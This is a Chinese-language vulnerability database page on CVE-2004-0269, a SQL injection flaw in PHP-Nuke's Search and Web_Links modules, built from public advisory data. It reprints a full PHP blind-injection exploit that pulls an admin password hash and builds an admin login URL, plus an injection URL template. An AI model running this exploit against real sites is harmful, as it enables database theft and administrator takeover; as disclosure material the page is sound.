CVE-2004-0269
CVSS6.4
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:42:48
NMCOES    

[原文]SQL injection vulnerability in PHP-Nuke 6.9 and earlier, and possibly 7.x, allows remote attackers to inject arbitrary SQL code and gain sensitive information via (1) the category variable in the Search module or (2) the admin variable in the Web_Links module.


[CNNVD]PHP-Nuke Category参数SQL注入漏洞(CNNVD-200411-123)

        
        PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
        PHP-Nuke包含的'index.php'脚本对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得数据库敏感信息及修改数据库内容。
        当执行搜索时,index.php脚本对用户提交给$category变量的数据缺少充分过滤,提交包含SQL命令的数据作为$category变量参数,可更改原来数据库逻辑,获得数据库敏感信息及修改数据库内容。
        

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:francisco_burzi:php-nuke:5.4
cpe:/a:francisco_burzi:php-nuke:5.1
cpe:/a:francisco_burzi:php-nuke:6.0
cpe:/a:francisco_burzi:php-nuke:2.5
cpe:/a:francisco_burzi:php-nuke:4.3
cpe:/a:francisco_burzi:php-nuke:5.2
cpe:/a:francisco_burzi:php-nuke:6.6
cpe:/a:francisco_burzi:php-nuke:5.0
cpe:/a:francisco_burzi:php-nuke:3.0
cpe:/a:francisco_burzi:php-nuke:6.5_rc1
cpe:/a:francisco_burzi:php-nuke:4.4
cpe:/a:francisco_burzi:php-nuke:5.0.1
cpe:/a:francisco_burzi:php-nuke:1.0
cpe:/a:francisco_burzi:php-nuke:4.4.1a
cpe:/a:francisco_burzi:php-nuke:5.2a
cpe:/a:francisco_burzi:php-nuke:4.0
cpe:/a:francisco_burzi:php-nuke:6.5_rc2
cpe:/a:francisco_burzi:php-nuke:6.5_beta1
cpe:/a:francisco_burzi:php-nuke:6.7
cpe:/a:francisco_burzi:php-nuke:5.5
cpe:/a:francisco_burzi:php-nuke:5.3.1
cpe:/a:francisco_burzi:php-nuke:5.6
cpe:/a:francisco_burzi:php-nuke:6.5
cpe:/a:francisco_burzi:php-nuke:6.5_final
cpe:/a:francisco_burzi:php-nuke:6.9
cpe:/a:francisco_burzi:php-nuke:6.5_rc3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0269
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0269
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-123
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107643348117646&w=2
(UNKNOWN)  BUGTRAQ  20040210 [SCAN Associates Sdn Bhd Security Advisory] PHPNuke 6.9 > and below SQL Injection in multiple module
http://www.scan-associates.net/papers/phpnuke69.txt
(UNKNOWN)  MISC  http://www.scan-associates.net/papers/phpnuke69.txt
http://www.securityfocus.com/bid/9630
(VENDOR_ADVISORY)  BID  9630
http://xforce.iss.net/xforce/xfdb/15115
(VENDOR_ADVISORY)  XF  phpnuke-modules-sql-injection(15115)

- 漏洞信息

PHP-Nuke Category参数SQL注入漏洞
中危 输入验证
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        
        PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
        PHP-Nuke包含的'index.php'脚本对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得数据库敏感信息及修改数据库内容。
        当执行搜索时,index.php脚本对用户提交给$category变量的数据缺少充分过滤,提交包含SQL命令的数据作为$category变量参数,可更改原来数据库逻辑,获得数据库敏感信息及修改数据库内容。
        

- 公告与补丁

        厂商补丁:
        Francisco Burzi
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.phpnuke.org

- 漏洞信息 (22589)

PHPNuke 5.x/6.x Web_Links Module Remote SQL Injection Vulnerability (EDBID:22589)
php webapps
2003-05-12 Verified
0 Albert Puigsech Galicia
N/A [点击下载]
source: http://www.securityfocus.com/bid/7558/info

It has been reported that multiple input validation bugs exist in the Web_Links module used by PHPNuke. Because of this, a remote user may be able to access the database and potentially gain access to sensitive information. Successful exploitation could result in compromise of the web forums or more severe consequences. 

http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>

where <our_code> represents attacker-supplied SQL code. 		

- 漏洞信息 (23680)

PHPNuke 6.x Category Parameter SQL Injection Vulnerability (EDBID:23680)
php webapps
2003-12-23 Verified
0 pokleyzz
N/A [点击下载]
source: http://www.securityfocus.com/bid/9630/info

It has been reported that PHPNuke may prone to a SQL injection vulnerability, due to insufficient sanitization user-supplied input. The problem is reported to exist in the $category variable contained within the 'index.php' page.

PHPNuke versions 6.9 and prior have been reported to be prone to this issue, however other versions may be affected as well.

#!/usr/bin/php -q
PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>

<?php
/*
# PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>
# 27th December 2003 : 4:54 a.m
#
# bug found by pokleyzz (11th December 2003 ) for HITB 2003 security conference
# (Shame on You!!) 
#
# Requirement:
#	PHP 4.x with curl extension;
#
# Greet: 
#	tynon, sk ,wanvadder,  sir_flyguy, wxyz , tenukboncit, kerengga_kurus , 
#	s0cket370 , b0iler and ...
#
# Happy new year 2004 ...
#
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#
# Tribute to Search - "kejoraku bersatu.mp3"
#
*/
if (!(function_exists('curl_init'))) {
	echo "cURL extension required\n";
	exit;
}

ini_set("max_execution_time","999999");
 
$matches = "No matches found to your query";

//$url = "http://127.0.0.1/src/phpnuke441a/html";
$charmap = array (48,49,50,51,52,53,54,55,56,57,
		  97,98,99,100,101,102,
		  103,104,105,
		  106,107,108,109,110,111,112,113,
		  114,115,116,117,118,119,120,121,122
		  );
		  
if($argv[1] && $argv[2]){
	
	$url = $argv[1];
	$author = $argv[2];
	if ($argv[3])
		$proxy = $argv[3]; 
}
else {
	echo "Usage: ".$argv[0]." <URL> <aid> [proxy]\n\n";
	echo "\tURL\t URL to phpnuke site (ex: http://127.0.0.1/html)\n";
	echo "\taid\t author id to get  (ex: god)\n";
	echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n"; 
	exit;
}
$search = "/modules.php?name=Search";
echo "Take your time for Teh Tarik... please wait ...\n\n";
echo "Result:\n";
echo "\t$author:";
$admin = $author.":";
$i =0;
$tmp = "char(";
while ($i < strlen($author)){
	$tmp .= ord(substr($author,$i,1));
	$i++;
	if ($i < strlen($author)){
		$tmp .= ",";
	} 
}
$tmp .= ")";
$author=$tmp;

for($i= 1;$i< 33;$i++){ 
	foreach ($charmap as $char){
		echo chr($char);
		$postvar = "query=%25&category=99999+or+a.aid=$author+and+ascii(substring(a.pwd,$i,1))=$char";
		$ch = curl_init();
		if ($proxy){
			curl_setopt($ch, CURLOPT_PROXY,$proxy); 
		}
		curl_setopt($ch, CURLOPT_URL,$url.$search);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar);
		$res=curl_exec ($ch);
		curl_close ($ch);
		if (!(ereg($matches,$res))){
			//echo chr($char);
			$admin .= chr($char);
			break 1;
		}
		else {
			echo chr(8);
		}
		
		if ($char ==103){
			echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";
			exit;
		}
		
	}
}
$admin .= "::";
echo "\n\nAdmin URL:\n";
echo "\t$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin));
echo "\n";
echo "\n\nEnjoy your self and Happy New Year 2004....";
?>
		

- 漏洞信息

3929
PHP-Nuke Web_Links Module admin Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

PHP-Nuke contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the $admin variable in the Web_Links module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- 时间线

2004-02-10 2004-12-27
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PHPNuke Category Parameter SQL Injection Vulnerability
Input Validation Error 9630
Yes No
2004-02-10 12:00:00 2009-07-12 02:06:00
The disclosure of this issue has been credited to pokleyzz <pokleyzz_at_scan-associates.net>.

- 受影响的程序版本

Francisco Burzi PHP-Nuke 6.9
Francisco Burzi PHP-Nuke 6.7
Francisco Burzi PHP-Nuke 6.6
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 5.5
Francisco Burzi PHP-Nuke 5.4
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PHP-Nuke 5.2 a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 4.4.1 a
Francisco Burzi PHP-Nuke 4.4
Francisco Burzi PHP-Nuke 4.3
Francisco Burzi PHP-Nuke 4.0
Francisco Burzi PHP-Nuke 3.0
- Linux kernel 2.2
Francisco Burzi PHP-Nuke 2.5
Francisco Burzi PHP-Nuke 1.0

- 漏洞讨论

It has been reported that PHPNuke may prone to a SQL injection vulnerability, due to insufficient sanitization user-supplied input. The problem is reported to exist in the $category variable contained within the 'index.php' page.

PHPNuke versions 6.9 and prior have been reported to be prone to this issue, however other versions may be affected as well.

- 漏洞利用

The following exploit has been provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站